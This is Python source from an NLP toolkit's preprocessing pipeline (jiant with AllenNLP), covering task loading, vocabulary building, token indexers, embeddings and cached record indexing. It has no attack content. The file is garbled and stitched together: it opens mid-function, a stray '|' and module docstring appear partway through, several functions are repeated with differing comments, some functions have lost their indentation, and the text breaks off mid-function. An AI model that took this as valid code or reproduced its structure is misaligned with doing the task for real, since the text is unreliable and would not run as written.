    max_v_sizes = {"word": args.max_word_v_size, "char": args.max_char_v_size}
    word2freq, char2freq = get_words(tasks)
    vocab = get_vocab(word2freq, char2freq, max_v_sizes)
    for task in tasks:  # add custom label namespaces
        add_task_label_vocab(vocab, task)
    if args.force_include_wsj_vocabulary:
        # Add WSJ full vocabulary for PTB F1 parsing tasks.
        add_wsj_vocab(vocab, args.data_dir)
    if args.input_module == "gpt":
        # Add pre-computed BPE vocabulary for OpenAI transformer model.
        add_openai_bpe_vocab(vocab, "openai_bpe")
    if args.input_module.startswith("bert"):
        # Add pre-computed BPE vocabulary for BERT model.
        add_bert_wpm_vocab(vocab, args.input_module)
    vocab.save_to_files(vocab_path)
    log.info("\tSaved vocab to %s", vocab_path)
    # del word2freq, char2freq, target2freq
def build_indexers(args):
    """Build the AllenNLP token indexers implied by the experiment config.

    Args:
        args: config object; reads input_module, tokenizer, char_embs, cove.

    Returns:
        dict mapping indexer namespace -> TokenIndexer.

    Raises:
        AssertionError: if the tokenizer setting is incompatible with the
            chosen input module, or incompatible indexers are combined.
    """
    indexers = {}
    if not args.input_module.startswith("bert") and args.input_module not in ["elmo", "gpt"]:
        indexers["words"] = SingleIdTokenIndexer()
    if args.input_module == "elmo":
        indexers["elmo"] = ELMoTokenCharactersIndexer("elmo")
        assert args.tokenizer in {"", "MosesTokenizer"}
    if args.char_embs:
        indexers["chars"] = TokenCharactersIndexer("chars")
    if args.cove:
        # BUGFIX: the second fragment was missing the f-prefix, so
        # {args.tokenizer} was printed literally instead of interpolated.
        assert args.tokenizer == "MosesTokenizer", (
            "CoVe model expects Moses tokenization (MosesTokenizer);"
            f" you are using args.tokenizer = {args.tokenizer}"
        )
    if args.input_module == "gpt":
        assert (
            not indexers
        ), "OpenAI transformer is not supported alongside other indexers due to tokenization."
        assert (
            args.tokenizer == "OpenAI.BPE"
        ), "OpenAI transformer uses custom BPE tokenization. Set tokenizer=OpenAI.BPE."
        indexers["openai_bpe_pretokenized"] = SingleIdTokenIndexer("openai_bpe")
    if args.input_module.startswith("bert"):
        assert not indexers, "BERT is not supported alongside other indexers due to tokenization."
        assert args.tokenizer == args.input_module, (
            "BERT models use custom WPM tokenization for "
            "each model, so tokenizer must match the "
            "specified BERT model."
        )
        indexers["bert_wpm_pretokenized"] = SingleIdTokenIndexer(args.input_module)
    return indexers
def build_tasks(args):
    """Main logic for preparing tasks, doing so by
    1) creating / loading the tasks
    2) building / loading the vocabulary
    3) building / loading the word vectors
    4) indexing each task's data
    5) initializing lazy loaders (streaming iterators)

    Returns:
        (pretrain_tasks, target_tasks, vocab, word_embs)
    """
    # 1) create / load tasks
    tasks, pretrain_task_names, target_task_names = get_tasks(args)
    for task in tasks:
        task_classifier = config.get_task_attr(args, task.name, "use_classifier")
        setattr(task, "_classifier_name", task_classifier if task_classifier else task.name)

    tokenizer_names = {task.name: task.tokenizer_name for task in tasks}
    # BUGFIX: second message fragment was missing the f-prefix (placeholder
    # never interpolated); also dropped the invalid ':s' spec on a dict.
    assert len(set(tokenizer_names.values())) == 1, (
        f"Error: mixing tasks with different tokenizers! Tokenizations: {tokenizer_names}"
    )

    # 2) build / load vocab and indexers
    indexers = build_indexers(args)
    vocab_path = os.path.join(args.exp_dir, "vocab")
    if args.reload_vocab or not os.path.exists(vocab_path):
        _build_vocab(args, tasks, vocab_path)
    # Always load vocab from file.
    vocab = Vocabulary.from_files(vocab_path)
    log.info("\tLoaded vocab from %s", vocab_path)
    for namespace, mapping in vocab._index_to_token.items():
        log.info("\tVocab namespace %s: size %d", namespace, len(mapping))
    log.info("\tFinished building vocab.")
    args.max_word_v_size = vocab.get_vocab_size("tokens")
    args.max_char_v_size = vocab.get_vocab_size("chars")

    # 3) build / load word vectors
    word_embs = None
    if args.input_module not in ["elmo", "gpt", "scratch"] and not args.input_module.startswith(
        "bert"
    ):
        emb_file = os.path.join(args.exp_dir, "embs.pkl")
        if args.reload_vocab or not os.path.exists(emb_file):
            word_embs = _build_embeddings(args, vocab, emb_file)
        else:  # load from file
            word_embs = pkl.load(open(emb_file, "rb"))
        log.info("Trimmed word embeddings: %s", str(word_embs.size()))

    # 4) Index tasks using vocab (if preprocessed copy not available).
    preproc_dir = os.path.join(args.exp_dir, "preproc")
    utils.maybe_make_dir(preproc_dir)
    reindex_tasks = parse_task_list_arg(args.reindex_tasks)
    utils.assert_for_log(
        not (args.reload_indexing and not reindex_tasks),
        'Flag reload_indexing was set, but no tasks are set to reindex (use -o "args.reindex_tasks'
        ' = "task1,task2,..."")',
    )
    for task in tasks:
        force_reindex = args.reload_indexing and task.name in reindex_tasks
        for split in ALL_SPLITS:
            log_prefix = "\tTask '%s', split '%s'" % (task.name, split)
            relative_path = _get_serialized_record_path(task.name, split, "preproc")
            cache_found = _find_cached_file(
                args.exp_dir, args.global_ro_exp_dir, relative_path, log_prefix=log_prefix
            )
            if force_reindex or not cache_found:
                # Re-index from scratch.
                record_file = _get_serialized_record_path(task.name, split, preproc_dir)
                if os.path.exists(record_file) and os.path.islink(record_file):
                    os.remove(record_file)
                _index_split(task, split, indexers, vocab, record_file)
        # Delete in-memory data - we'll lazy-load from disk later.
        # TODO: delete task.{split}_data_text as well?
        task.train_data = None
        task.val_data = None
        task.test_data = None
    log.info("\tFinished indexing tasks")

    # 5) Initialize tasks with data iterators.
    pretrain_tasks = []
    target_tasks = []
    for task in tasks:
        # Replace lists of instances with lazy generators from disk.
        task.val_data = _get_instance_generator(task.name, "val", preproc_dir)
        task.test_data = _get_instance_generator(task.name, "test", preproc_dir)
        # When using pretrain_data_fraction, we need modified iterators for use
        # only on training datasets at pretraining time.
        if task.name in pretrain_task_names:
            log.info("\tCreating trimmed pretraining-only version of " + task.name + " train.")
            # BUGFIX: double quotes inside a double-quoted f-string are a
            # SyntaxError before Python 3.12; use single quotes in replace().
            task.pretrain_fraction = float(
                args.get(f"pretrain_{task.name.replace('-', '_')}_fraction", 1.0)
            )
            # task.pretrain_fraction = args.pretrain_data_fraction  # Original
            log.info(
                f"Task {task.name} instance generator using "
                f"{task.pretrain_fraction * 100}% of training data."
            )
            task.train_data = _get_instance_generator(
                task.name, "train", preproc_dir, fraction=task.pretrain_fraction
            )
            pretrain_tasks.append(task)
        # When using target_train_data_fraction, we need modified iterators
        # only for training datasets at do_target_task_training time.
        if task.name in target_task_names:
            log.info("\tCreating trimmed target-only version of " + task.name + " train.")
            task.target_train_fraction = float(
                args.get(f"target_train_{task.name.replace('-', '_')}_fraction", 1.0)
            )
            # task.target_train_fraction = args.target_train_data_fraction  # Original
            task.train_data = _get_instance_generator(
                task.name, "train", preproc_dir, fraction=task.target_train_fraction
            )
            target_tasks.append(task)
    log.info("\t Training on %s", ", ".join(pretrain_task_names))
    log.info("\t Evaluating on %s", ", ".join(target_task_names))
    return pretrain_tasks, target_tasks, vocab, word_embs
def parse_task_list_arg(task_list):
    """Expand a comma-separated task-list string into a list of task names.

    The macros "glue" and "superglue" expand into their full task groups;
    "none" entries and empty entries are dropped.
    """
    expanded = []
    for entry in task_list.split(","):
        if entry == "glue":
            expanded += ALL_GLUE_TASKS
        elif entry == "superglue":
            expanded += ALL_SUPERGLUE_TASKS
        elif entry not in ("none", ""):
            expanded.append(entry)
    return expanded
def _get_task(name, args, data_path, scratch_path):
    """Build a single task from raw data, or load a cached pickled copy.

    Args:
        name: registered task name (must be a key of TASKS_REGISTRY).
        args: config object providing `tokenizer`, `max_seq_len`, `reload_tasks`.
        data_path: root directory holding raw task data.
        scratch_path: experiment dir holding the task pickle cache.

    Returns:
        The constructed (or unpickled) Task object.
    """
    assert name in TASKS_REGISTRY, f"Task '{name:s}' not found!"
    task_cls, rel_path, task_kw = TASKS_REGISTRY[name]
    pkl_path = os.path.join(scratch_path, "tasks", f"{name:s}.{args.tokenizer:s}.pkl")
    # TODO: refactor to always read from disk, even if task is constructed
    # here. This should avoid subtle bugs from deserialization issues.
    if os.path.isfile(pkl_path) and not args.reload_tasks:
        # Fix: use a context manager so the cache file handle is not leaked.
        with open(pkl_path, "rb") as fh:
            task = pkl.load(fh)
        log.info("\tLoaded existing task %s", name)
    else:
        log.info("\tCreating task %s from scratch.", name)
        # These tasks take an additional kwarg.
        if name == "nli-prob" or name == "nli-alt":
            # TODO: remove special case, replace with something general
            # to pass custom loader args to task.
            task_kw["probe_path"] = args["nli-prob"].probe_path
        task_src_path = os.path.join(data_path, rel_path)
        task = task_cls(
            task_src_path,
            max_seq_len=args.max_seq_len,
            name=name,
            tokenizer_name=args.tokenizer,
            **task_kw,
        )
        task.load_data()
        utils.maybe_make_dir(os.path.dirname(pkl_path))
        # Fix: context manager for the dump as well (handle was leaked before).
        with open(pkl_path, "wb") as fh:
            pkl.dump(task, fh)
    return task
def get_task_without_loading_data(task_name, args):
    """Construct a Task object without reading its dataset from disk."""
    task_cls, _rel_path, task_kw = TASKS_REGISTRY[task_name]
    return task_cls(
        path=None,
        max_seq_len=args.max_seq_len,
        name=task_name,
        tokenizer_name=args.tokenizer,
        **task_kw,
    )
def get_tasks(args):
    """ Actually build or load (from pickles) the tasks.

    Returns:
        (tasks, pretrain_task_names, target_task_names): `tasks` is the
        de-duplicated union of pretrain and target tasks, sorted by name.
    """
    data_path = args.data_dir
    scratch_path = args.exp_dir
    pretrain_task_names = parse_task_list_arg(args.pretrain_tasks)
    target_task_names = parse_task_list_arg(args.target_tasks)
    # TODO: We don't want diagnostic tasks in train_task_names
    # but want to support glue/superglue task macros.
    pretrain_task_names = list(filter(lambda x: x not in ALL_DIAGNOSTICS, pretrain_task_names))
    # De-duplicate: a task may appear in both the pretrain and target lists.
    task_names = sorted(set(pretrain_task_names + target_task_names))
    assert data_path is not None
    # Fall back to writing preprocessed output next to the raw data.
    scratch_path = scratch_path or data_path
    log.info("Writing pre-preprocessed tasks to %s", scratch_path)
    tasks = []
    for name in task_names:
        task = _get_task(name, args, data_path=data_path, scratch_path=scratch_path)
        tasks.append(task)
        # Count examples, store in example_counts.
        if task.example_counts is None:
            task.count_examples()
        log.info(
            "\tTask '%s': %s",
            task.name,
            " ".join(("|%s|=%d" % kv for kv in task.example_counts.items())),
        )
    log.info("\tFinished loading tasks: %s.", " ".join([task.name for task in tasks]))
    return tasks, pretrain_task_names, target_task_names
def get_words(tasks):
    """Count word and character frequencies over every sentence of every task.

    Args:
        tasks: iterable of Task objects exposing `get_sentences()` and,
            optionally, a `target_sentences` attribute.

    Returns:
        (word2freq, char2freq): defaultdicts mapping token -> count and
        character -> count.
    """
    word2freq, char2freq = defaultdict(int), defaultdict(int)

    def update_vocab_freqs(sentence):
        """Update counts for words (and their characters) in the sentence."""
        for word in sentence:
            word2freq[word] += 1
            for char in word:
                char2freq[char] += 1

    for task in tasks:
        log.info("\tCounting words for task %s.", task.name)
        for sentence in task.get_sentences():
            update_vocab_freqs(sentence)
    # This branch is meant for tasks that have *English* target sentences
    # (or more generally, same language source and target sentences).
    # Tasks with different language source and target sentences should
    # count and return the vocab in a `task.all_labels()` method.
    for task in tasks:
        if hasattr(task, "target_sentences"):
            for sentence in task.target_sentences:
                # Bug fix: this previously called the undefined name
                # `update_target_vocab_freqs`, raising NameError.
                update_vocab_freqs(sentence)
    return word2freq, char2freq
def get_vocab(word2freq, char2freq, max_v_sizes):
    """Build a Vocabulary containing the most frequent words and characters.

    Special tokens go into the "tokens" namespace first, followed by the top
    `max_v_sizes["word"]` words; the top `max_v_sizes["char"]` characters go
    into the "chars" namespace.
    """
    vocab = Vocabulary(counter=None, max_vocab_size=max_v_sizes)
    for special in SPECIALS:
        vocab.add_token_to_namespace(special, "tokens")
    top_words = sorted(word2freq.items(), key=lambda kv: kv[1], reverse=True)
    for word, _ in top_words[: max_v_sizes["word"]]:
        vocab.add_token_to_namespace(word, "tokens")
    top_chars = sorted(char2freq.items(), key=lambda kv: kv[1], reverse=True)
    for char, _ in top_chars[: max_v_sizes["char"]]:
        vocab.add_token_to_namespace(char, "chars")
    return vocab
def add_task_label_vocab(vocab, task):
    """Add custom task labels to a separate namespace.
    If task has a 'get_all_labels' method, call that to get a list of labels
    to populate the <task_name>_labels vocabulary namespace.
    This is the recommended way to implement multiclass models: in your task's
    process_split code, make instances that use LabelFields with the task label
    namespace, e.g.:
    label_namespace = "%s_labels" % self.name
    label = LabelField(label_string, label_namespace=label_namespace)
    This will cause them to be properly indexed by the Vocabulary.
    This can then be accessed when generating Instances, either via a custom
    Indexer or by invoking the namespace when creating a LabelField.
    """
    # Tasks without custom labels have nothing to add.
    if not hasattr(task, "get_all_labels"):
        return
    utils.assert_for_log(
        hasattr(task, "_label_namespace"),
        "Task %s is missing method `_label_namespace`!" % task.name,
    )
    namespace = task._label_namespace
    # A namespace of None means the task opted out of a label vocabulary.
    if namespace is None:
        return
    log.info("\tTask '%s': adding vocab namespace '%s'", task.name, namespace)
    for label in task.get_all_labels():
        vocab.add_token_to_namespace(label, namespace)
def add_bert_wpm_vocab(vocab, bert_model_name):
    """Add BERT WPM vocabulary for use with pre-tokenized data.
    BertTokenizer has a convert_tokens_to_ids method, but this doesn't do
    anything special so we can just use the standard indexers.
    """
    from pytorch_pretrained_bert import BertTokenizer
    # Cased/uncased variants are distinguished by the model name string.
    do_lower_case = "uncased" in bert_model_name
    tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=do_lower_case)
    # Insert tokens in id order so vocab indices line up with wordpiece ids.
    ordered_vocab = tokenizer.convert_ids_to_tokens(range(len(tokenizer.vocab)))
    log.info("BERT WPM vocab (model=%s): %d tokens", bert_model_name, len(ordered_vocab))
    for word in ordered_vocab:
        # The namespace is the model name itself, so different BERT variants
        # don't collide.
        vocab.add_token_to_namespace(word, bert_model_name)
def add_openai_bpe_vocab(vocab, namespace="openai_bpe"):
    """Add OpenAI BPE vocabulary for use with pre-tokenized data."""
    from .openai_transformer_lm import utils as openai_utils
    # Mapping of BPE id -> wordpiece; insert in id order so vocab indices
    # line up with the pretrained model's embedding rows.
    id_to_wordpiece = openai_utils.reverse_encoder_dict
    for i in range(len(id_to_wordpiece)):
        vocab.add_token_to_namespace(id_to_wordpiece[i], namespace)
    # Add SOS and EOS tokens to *end* of namespace, since this is where the
    # OpenAI model expects special tokens.
    # NOTE(review): these come from jiant.utils.utils, not this module's own
    # SOS_TOK/EOS_TOK constants — confirm they are defined there.
    vocab.add_token_to_namespace(utils.SOS_TOK, namespace)
    vocab.add_token_to_namespace(utils.EOS_TOK, namespace)
def add_wsj_vocab(vocab, data_dir, namespace="tokens"):
    """Add WSJ vocabulary for PTB parsing models.

    Args:
        vocab: Vocabulary to add tokens into.
        data_dir: directory containing WSJ/tokens.txt (one token per line).
        namespace: vocabulary namespace to use.
    """
    wsj_vocab_path = os.path.join(data_dir, "WSJ/tokens.txt")
    # To create the tokens.txt file: Run only WSJ LM baseline on jiant, and
    # duplicate the vocab file generated.
    assert os.path.exists(wsj_vocab_path), "WSJ vocab file doesn't exist."
    # Fix: close the file via a context manager (the handle was leaked before)
    # and log the path rather than the raw file object.
    with open(wsj_vocab_path) as wsj_tokens:
        for line in wsj_tokens:
            vocab.add_token_to_namespace(line.strip(), namespace)
    log.info("\tAdded WSJ vocabulary from %s", wsj_vocab_path)
| """Preprocessing functions and pipeline
The pipeline is three steps
1) create / load tasks, which includes
a) load raw data
b) tokenize raw data
2) create / load all vocabularies (word, char, task-specific target vocabs)
a) count tokens of a vocab
b) take the N most frequent tokens
3) index all the data using appropriate indexers
We save indexed data to streamable Records to save memory.
"""
import _pickle as pkl # :(
import copy
import io
import logging as log
import os
import sys
from collections import defaultdict
import numpy as np
import torch
from allennlp.data import Vocabulary
from allennlp.data.token_indexers import (
ELMoTokenCharactersIndexer,
SingleIdTokenIndexer,
TokenCharactersIndexer,
)
from jiant.tasks import (
ALL_DIAGNOSTICS,
ALL_COLA_NPI_TASKS,
ALL_GLUE_TASKS,
ALL_SUPERGLUE_TASKS,
ALL_NLI_PROBING_TASKS,
)
from jiant.tasks import REGISTRY as TASKS_REGISTRY
from jiant.utils import config, serialize, utils
# NOTE: these are not that same as AllenNLP SOS, EOS tokens
SOS_TOK, EOS_TOK = "<SOS>", "<EOS>"
# NOTE: pad and unk tokens are created by AllenNLP vocabs by default
SPECIALS = [SOS_TOK, EOS_TOK]  # special tokens added to the "tokens" namespace
UNK_TOK = "@@UNKNOWN@@" # AllenNLP unk token
# Every task gets all three splits indexed and serialized.
ALL_SPLITS = ["train", "val", "test"]
def _get_serialized_record_path(task_name, split, preproc_dir):
"""Get the canonical path for a serialized task split."""
serialized_record_path = os.path.join(preproc_dir, "{:s}__{:s}_data".format(task_name, split))
return serialized_record_path
def _get_instance_generator(task_name, split, preproc_dir, fraction=None):
    """Return a repeatable lazy iterator over a task split's saved Instances.

    Args:
        task_name: (string), task name
        split: (string), split name ('train', 'val', or 'test')
        preproc_dir: (string) path to preprocessing dir
        fraction: if set to a float between 0 and 1, load only that share of
            examples; hashing keeps the selected subset stable across epochs.

    Returns:
        serialize.RepeatableIterator yielding Instance objects
    """
    record_path = _get_serialized_record_path(task_name, split, preproc_dir)
    assert os.path.isfile(record_path), "Record file '%s' not found!" % record_path
    return serialize.read_records(record_path, repeatable=True, fraction=fraction)
def _indexed_instance_generator(instance_iter, vocab):
    """Yield instances after indexing them in-place against `vocab`.

    TODO(iftenney): multiprocess the $%^& out of this.

    Args:
        instance_iter: iterable(Instance) of examples
        vocab: Vocabulary for use in indexing

    Yields:
        Instance with indexed fields.
    """
    for inst in instance_iter:
        inst.index_fields(vocab)
        # Strip token fields to save memory and disk.
        del_field_tokens(inst)
        yield inst
def del_field_tokens(instance):
    """Delete cached tokens from an Instance's 'input1'/'input2' fields.

    Saves memory once indexing is done; every other field keeps its tokens.
    The instance is modified in place.
    """
    for field_name in ("input1", "input2"):
        if field_name in instance.fields:
            del instance.fields[field_name].tokens
def _index_split(task, split, indexers, vocab, record_file):
    """Index instances and stream to disk.

    Instances flow through `_indexed_instance_generator`, so only a bounded
    number are held in memory while being serialized to `record_file`.

    Args:
        task: Task instance
        split: (string), 'train', 'val', or 'test'
        indexers: dict of token indexers
        vocab: Vocabulary instance
        record_file: (string) file to write serialized Instances to
    """
    log_prefix = "\tTask %s (%s)" % (task.name, split)
    log.info("%s: Indexing from scratch.", log_prefix)
    split_text = task.get_split_text(split)
    instance_iter = task.process_split(split_text, indexers)
    if hasattr(instance_iter, "__len__"):  # if non-lazy
        log.warn(
            "%s: non-lazy Instance generation. You'll want to refactor "
            "%s.process_split to return a lazy iterator.",
            log_prefix,
            type(task).__name__,
        )
        log.info("%s: %d examples to index", log_prefix, len(instance_iter))
        # Copy so that we don't store indexed data in memory.
        # TODO: remove this case and stream everything.
        instance_iter = utils.copy_iter(instance_iter)
    # Counter for lazy-loaded data, so we can log the # of elements.
    # (nonlocal lets the wrapping generator update it as records stream out.)
    _instance_counter = 0

    def _counter_iter(elems):
        nonlocal _instance_counter
        for elem in elems:
            _instance_counter += 1
            yield elem

    instance_iter = _counter_iter(instance_iter)
    # Actually call generators and stream to disk.
    serialize.write_records(_indexed_instance_generator(instance_iter, vocab), record_file)
    log.info("%s: Saved %d instances to %s", log_prefix, _instance_counter, record_file)
def _find_cached_file(
exp_dir: str, global_exp_cache_dir: str, relative_path: str, log_prefix: str = ""
) -> bool:
"""Find a cached file.
Look in local exp_dir first, then in global_exp_cache_dir. If found in the
global dir, make a symlink in the local dir pointing to the global one.
Args:
exp_dir: (string) local experiment dir
global_exp_cache_dir: (string) global experiment cache
relative_path: (string) relative path to file, from exp_dir
log_prefix: (string) prefix for logging info
Returns:
True if file was found in either location.
"""
if log_prefix:
log_prefix = log_prefix + ": "
# Try in local preproc dir.
local_file = os.path.join(exp_dir, relative_path)
if os.path.isfile(local_file) or os.path.islink(local_file):
log.info("%sFound preprocessed copy in %s", log_prefix, local_file)
return True
# Try in global preproc dir; if found, make a symlink.
global_file = os.path.join(global_exp_cache_dir, relative_path)
if os.path.exists(global_file):
log.info("%sFound (global) preprocessed copy in %s", log_prefix, global_file)
os.symlink(global_file, local_file)
log.info("%sCreated symlink: %s -> %s", log_prefix, local_file, global_file)
return True
return False
def _build_embeddings(args, vocab, emb_file: str):
""" Build word embeddings from scratch (as opposed to loading them from a pickle),
using precomputed fastText / GloVe embeddings. """
# Load all the word embeddings based on vocabulary
log.info("\tBuilding embeddings from scratch.")
word_v_size, unk_idx = vocab.get_vocab_size("tokens"), vocab.get_token_index(vocab._oov_token)
embeddings = np.random.randn(word_v_size, args.d_word)
with io.open(
args.word_embs_file, "r", encoding="utf-8", newline="\n", errors="ignore"
) as vec_fh:
for line in vec_fh:
word, vec = line.split(" ", 1)
idx = vocab.get_token_index(word)
if idx != unk_idx:
embeddings[idx] = np.array(list(map(float, vec.split())))
embeddings[vocab.get_token_index(vocab._padding_token)] = 0.0
embeddings = torch.FloatTensor(embeddings)
log.info("\tFinished loading embeddings")
# Save/cache the word embeddings
pkl.dump(embeddings, open(emb_file, "wb"))
log.info("\tSaved embeddings to %s", emb_file)
return embeddings
def _build_vocab(args, tasks, vocab_path: str):
    """ Build vocabulary from scratch, reading data from tasks.

    Counts tokens over all task sentences, keeps the most frequent, adds
    per-task label namespaces and any model-specific (BERT/GPT/WSJ)
    vocabularies, then serializes the result to `vocab_path`.
    """
    # NOTE: task-specific target vocabulary should be counted in the task object
    # and provided via `task.all_labels()`. The namespace should be task-specific,
    # i.e. not something generic like "targets".
    log.info("\tBuilding vocab from scratch.")
    max_v_sizes = {"word": args.max_word_v_size, "char": args.max_char_v_size}
    word2freq, char2freq = get_words(tasks)
    vocab = get_vocab(word2freq, char2freq, max_v_sizes)
    for task in tasks:  # add custom label namespaces
        add_task_label_vocab(vocab, task)
    if args.force_include_wsj_vocabulary:
        # Add WSJ full vocabulary for PTB F1 parsing tasks.
        add_wsj_vocab(vocab, args.data_dir)
    if args.input_module == "gpt":
        # Add pre-computed BPE vocabulary for OpenAI transformer model.
        add_openai_bpe_vocab(vocab, "openai_bpe")
    if args.input_module.startswith("bert"):
        # Add pre-computed BPE vocabulary for BERT model.
        add_bert_wpm_vocab(vocab, args.input_module)
    vocab.save_to_files(vocab_path)
    log.info("\tSaved vocab to %s", vocab_path)
    # del word2freq, char2freq, target2freq
def build_indexers(args):
    """Create the token indexers matching the configured input module.

    Args:
        args: config with `input_module`, `tokenizer`, `char_embs`, `cove`.

    Returns:
        dict mapping indexer name -> AllenNLP TokenIndexer.
    """
    indexers = {}
    if not args.input_module.startswith("bert") and args.input_module not in ["elmo", "gpt"]:
        indexers["words"] = SingleIdTokenIndexer()
    if args.input_module == "elmo":
        indexers["elmo"] = ELMoTokenCharactersIndexer("elmo")
        assert args.tokenizer in {"", "MosesTokenizer"}
    if args.char_embs:
        indexers["chars"] = TokenCharactersIndexer("chars")
    if args.cove:
        # Bug fix: the second string lacked the f-prefix, so the configured
        # tokenizer was never interpolated into the assertion message.
        assert args.tokenizer == "MosesTokenizer", (
            "CoVe model expects Moses tokenization (MosesTokenizer);"
            f" you are using args.tokenizer = {args.tokenizer}"
        )
    if args.input_module == "gpt":
        assert (
            not indexers
        ), "OpenAI transformer is not supported alongside other indexers due to tokenization."
        assert (
            args.tokenizer == "OpenAI.BPE"
        ), "OpenAI transformer uses custom BPE tokenization. Set tokenizer=OpenAI.BPE."
        indexers["openai_bpe_pretokenized"] = SingleIdTokenIndexer("openai_bpe")
    if args.input_module.startswith("bert"):
        assert not indexers, "BERT is not supported alongside other indexers due to tokenization."
        assert args.tokenizer == args.input_module, (
            "BERT models use custom WPM tokenization for "
            "each model, so tokenizer must match the "
            "specified BERT model."
        )
        indexers["bert_wpm_pretokenized"] = SingleIdTokenIndexer(args.input_module)
    return indexers
def build_tasks(args):
    """Main logic for preparing tasks, doing so by
    1) creating / loading the tasks
    2) building / loading the vocabulary
    3) building / loading the word vectors
    4) indexing each task's data
    5) initializing lazy loaders (streaming iterators)

    Returns:
        (pretrain_tasks, target_tasks, vocab, word_embs)
    """
    # 1) create / load tasks
    tasks, pretrain_task_names, target_task_names = get_tasks(args)
    for task in tasks:
        task_classifier = config.get_task_attr(args, task.name, "use_classifier")
        setattr(task, "_classifier_name", task_classifier if task_classifier else task.name)
    tokenizer_names = {task.name: task.tokenizer_name for task in tasks}
    # Bug fix: the message mixed a plain string containing "{...}" (no
    # f-prefix) with a ":s" format on a dict, which itself raises TypeError;
    # interpolate the mapping directly instead.
    assert len(set(tokenizer_names.values())) == 1, (
        f"Error: mixing tasks with different tokenizers! Tokenizations: {tokenizer_names}"
    )
    # 2) build / load vocab and indexers
    indexers = build_indexers(args)
    vocab_path = os.path.join(args.exp_dir, "vocab")
    if args.reload_vocab or not os.path.exists(vocab_path):
        _build_vocab(args, tasks, vocab_path)
    # Always load vocab from file.
    vocab = Vocabulary.from_files(vocab_path)
    log.info("\tLoaded vocab from %s", vocab_path)
    for namespace, mapping in vocab._index_to_token.items():
        log.info("\tVocab namespace %s: size %d", namespace, len(mapping))
    log.info("\tFinished building vocab.")
    args.max_word_v_size = vocab.get_vocab_size("tokens")
    args.max_char_v_size = vocab.get_vocab_size("chars")
    # 3) build / load word vectors
    word_embs = None
    if args.input_module not in ["elmo", "gpt", "scratch"] and not args.input_module.startswith(
        "bert"
    ):
        emb_file = os.path.join(args.exp_dir, "embs.pkl")
        if args.reload_vocab or not os.path.exists(emb_file):
            word_embs = _build_embeddings(args, vocab, emb_file)
        else:  # load from file
            # Fix: context manager so the cache file handle is not leaked.
            with open(emb_file, "rb") as fh:
                word_embs = pkl.load(fh)
        log.info("Trimmed word embeddings: %s", str(word_embs.size()))
    # 4) Index tasks using vocab (if preprocessed copy not available).
    preproc_dir = os.path.join(args.exp_dir, "preproc")
    utils.maybe_make_dir(preproc_dir)
    reindex_tasks = parse_task_list_arg(args.reindex_tasks)
    utils.assert_for_log(
        not (args.reload_indexing and not reindex_tasks),
        'Flag reload_indexing was set, but no tasks are set to reindex (use -o "args.reindex_tasks'
        ' = "task1,task2,..."")',
    )
    for task in tasks:
        force_reindex = args.reload_indexing and task.name in reindex_tasks
        for split in ALL_SPLITS:
            log_prefix = "\tTask '%s', split '%s'" % (task.name, split)
            relative_path = _get_serialized_record_path(task.name, split, "preproc")
            cache_found = _find_cached_file(
                args.exp_dir, args.global_ro_exp_dir, relative_path, log_prefix=log_prefix
            )
            if force_reindex or not cache_found:
                # Re-index from scratch; drop any stale symlink first so we
                # don't overwrite the (possibly shared) global cached copy.
                record_file = _get_serialized_record_path(task.name, split, preproc_dir)
                if os.path.exists(record_file) and os.path.islink(record_file):
                    os.remove(record_file)
                _index_split(task, split, indexers, vocab, record_file)
        # Delete in-memory data - we'll lazy-load from disk later.
        # TODO: delete task.{split}_data_text as well?
        task.train_data = None
        task.val_data = None
        task.test_data = None
    log.info("\tFinished indexing tasks")
    # 5) Initialize tasks with data iterators.
    pretrain_tasks = []
    target_tasks = []
    for task in tasks:
        # Replace lists of instances with lazy generators from disk.
        task.val_data = _get_instance_generator(task.name, "val", preproc_dir)
        task.test_data = _get_instance_generator(task.name, "test", preproc_dir)
        # When using pretrain_data_fraction, we need modified iterators for use
        # only on training datasets at pretraining time.
        if task.name in pretrain_task_names:
            log.info("\tCreating trimmed pretraining-only version of " + task.name + " train.")
            # Per-task fraction override, e.g. "pretrain_sst_2_fraction".
            task.pretrain_fraction = float(
                args.get(f"pretrain_{task.name.replace('-', '_')}_fraction", 1.0)
            )
            log.info(
                f"Task {task.name} instance generator using "
                f"{task.pretrain_fraction * 100}% of training data."
            )
            task.train_data = _get_instance_generator(
                task.name, "train", preproc_dir, fraction=task.pretrain_fraction
            )
            pretrain_tasks.append(task)
        # When using target_train_data_fraction, we need modified iterators
        # only for training datasets at do_target_task_training time.
        if task.name in target_task_names:
            log.info("\tCreating trimmed target-only version of " + task.name + " train.")
            task.target_train_fraction = float(
                args.get(f"target_train_{task.name.replace('-', '_')}_fraction", 1.0)
            )
            task.train_data = _get_instance_generator(
                task.name, "train", preproc_dir, fraction=task.target_train_fraction
            )
            target_tasks.append(task)
    log.info("\t Training on %s", ", ".join(pretrain_task_names))
    log.info("\t Evaluating on %s", ", ".join(target_task_names))
    return pretrain_tasks, target_tasks, vocab, word_embs
def parse_task_list_arg(task_list):
    """Parse a comma-separated task list into task names, expanding macros.

    "glue" and "superglue" expand to their task groups; "none" and empty
    entries are skipped.
    """
    names = []
    for tok in task_list.split(","):
        if tok == "glue":
            names.extend(ALL_GLUE_TASKS)
        elif tok == "superglue":
            names.extend(ALL_SUPERGLUE_TASKS)
        elif tok and tok != "none":
            names.append(tok)
    return names
def _get_task(name, args, data_path, scratch_path):
    """Build a single task from raw data, or load a cached pickled copy.

    Args:
        name: registered task name (must be a key of TASKS_REGISTRY).
        args: config object providing `tokenizer`, `max_seq_len`, `reload_tasks`.
        data_path: root directory holding raw task data.
        scratch_path: experiment dir holding the task pickle cache.

    Returns:
        The constructed (or unpickled) Task object.
    """
    assert name in TASKS_REGISTRY, f"Task '{name:s}' not found!"
    task_cls, rel_path, task_kw = TASKS_REGISTRY[name]
    pkl_path = os.path.join(scratch_path, "tasks", f"{name:s}.{args.tokenizer:s}.pkl")
    # TODO: refactor to always read from disk, even if task is constructed
    # here. This should avoid subtle bugs from deserialization issues.
    if os.path.isfile(pkl_path) and not args.reload_tasks:
        # Fix: use a context manager so the cache file handle is not leaked.
        with open(pkl_path, "rb") as fh:
            task = pkl.load(fh)
        log.info("\tLoaded existing task %s", name)
    else:
        log.info("\tCreating task %s from scratch.", name)
        # These tasks take an additional kwarg.
        if name == "nli-prob" or name == "nli-alt":
            # TODO: remove special case, replace with something general
            # to pass custom loader args to task.
            task_kw["probe_path"] = args["nli-prob"].probe_path
        task_src_path = os.path.join(data_path, rel_path)
